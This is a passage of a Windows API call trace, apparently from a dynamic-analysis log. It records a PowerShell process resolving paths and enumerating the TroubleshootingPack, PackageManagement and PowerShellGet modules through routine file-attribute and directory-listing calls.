lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\6.1.0.0__31bf3856ad364e35\\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll", nBufferLength=0x105, lpBuffer=0x5a0b2d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.Windows.Diagnosis.TroubleshootingPack\\6.1.0.0__31bf3856ad364e35\\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll", lpFilePart=0x0) returned 0x9a [0157.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x60 [0157.019] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x60, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", lpFilePart=0x0) returned 0x5f [0157.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0dbb0) returned 1 [0157.019] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25aa0c8 | out: lpFileInformation=0x25aa0c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd88a4ec5, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0xd88a4ec5, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x91837f7c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x5198)) returned 1 [0157.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0dbac) returned 1 [0157.020] EtwEventActivityIdControl () returned 0x0 [0157.020] SetEvent (hEvent=0x56c) returned 1 [0157.020] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x5a0e390*=0x56c, lpdwindex=0x5a0e1b4 | out: lpdwindex=0x5a0e1b4) returned 0x0 [0157.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x60 [0157.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", nBufferLength=0x60, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1", lpFilePart=0x0) returned 0x5f [0157.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e270) returned 1 [0157.021] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack\\TroubleshootingPack.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack\\troubleshootingpack.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25ab028 | out: lpFileInformation=0x25ab028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd88a4ec5, ftCreationTime.dwHighDateTime=0x1ca0400, ftLastAccessTime.dwLowDateTime=0xd88a4ec5, ftLastAccessTime.dwHighDateTime=0x1ca0400, ftLastWriteTime.dwLowDateTime=0x91837f7c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x5198)) returned 1 [0157.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e26c) returned 1 [0157.025] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules")) returned 0x10 [0157.026] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e524 | out: lpConsoleScreenBufferInfo=0x5a0e524) returned 1 [0157.026] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e524 | out: lpConsoleScreenBufferInfo=0x5a0e524) returned 1 [0157.206] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x5bfa678*=0x2a4, lpdwindex=0x5a0e398 | out: lpdwindex=0x5a0e398) returned 0x0 [0157.461] CoGetContextToken (in: pToken=0x5a0d90c | out: pToken=0x5a0d90c) returned 0x0 [0157.461] CoGetContextToken (in: pToken=0x5a0d8ec | out: pToken=0x5a0d8ec) returned 0x0 [0157.461] CoGetContextToken (in: pToken=0x5a0d870 | out: pToken=0x5a0d870) returned 0x0 [0157.461] CoGetContextToken (in: pToken=0x5a0d870 | out: pToken=0x5a0d870) returned 0x0 [0157.461] CoGetContextToken (in: pToken=0x5a0d870 | out: pToken=0x5a0d870) returned 0x0 [0157.765] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x5a0e45c, nSize=0xd7 | out: lpBuffer="") returned 0xc5 [0157.769] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules")) returned 0x10 [0157.770] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.770] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2b [0157.770] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x2b, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0157.770] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.771] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.771] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0157.771] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49aae0a0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49aae0a0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0157.771] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0157.771] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.771] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.772] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psd1")) returned 0xffffffff [0157.772] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.psm1")) returned 0xffffffff [0157.772] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.cdxml")) returned 0xffffffff [0157.772] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.xaml")) returned 0xffffffff [0157.772] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.ni.dll")) returned 0xffffffff [0157.772] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Modules.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\modules.dll")) returned 0xffffffff [0157.772] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0157.772] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0157.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e35c) returned 1 [0157.773] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x5a0e620 | out: lpFileInformation=0x5a0e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0157.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e358) returned 1 [0157.773] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0157.773] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0157.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e35c) returned 1 [0157.773] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x5a0e620 | out: lpFileInformation=0x5a0e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49aae0a0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49aae0a0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0157.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e358) returned 1 [0157.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.774] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0157.774] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0157.774] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.774] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.774] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ad4200, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49b46620, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49b46620, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0157.774] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0157.774] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.775] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0157.775] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0157.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e360) returned 1 [0157.775] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0e624 | out: lpFileInformation=0x5a0e624*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49b46620, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea9fba0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea9fba0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0157.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e35c) returned 1 [0157.775] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0157.775] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0157.775] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0157.775] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0157.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e384) returned 1 [0157.776] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b7b5c | out: lpFileInformation=0x25b7b5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49b46620, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea9fba0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea9fba0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0157.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e380) returned 1 [0157.776] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0157.776] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0157.776] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0157.776] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0157.776] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.ni.dll")) returned 0xffffffff [0157.777] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0157.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.777] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0157.777] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0157.777] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49aae0a0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49aae0a0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.777] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49aae0a0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49aae0a0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.777] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x49ad4200, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x49ad4200, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0157.778] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0157.778] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.778] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0157.778] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0157.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e360) returned 1 [0157.778] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0e624 | out: lpFileInformation=0x5a0e624*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49aae0a0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x3ea79a40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x3ea79a40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0157.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e35c) returned 1 [0157.778] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0157.778] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0157.778] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0157.779] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0157.779] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e384) returned 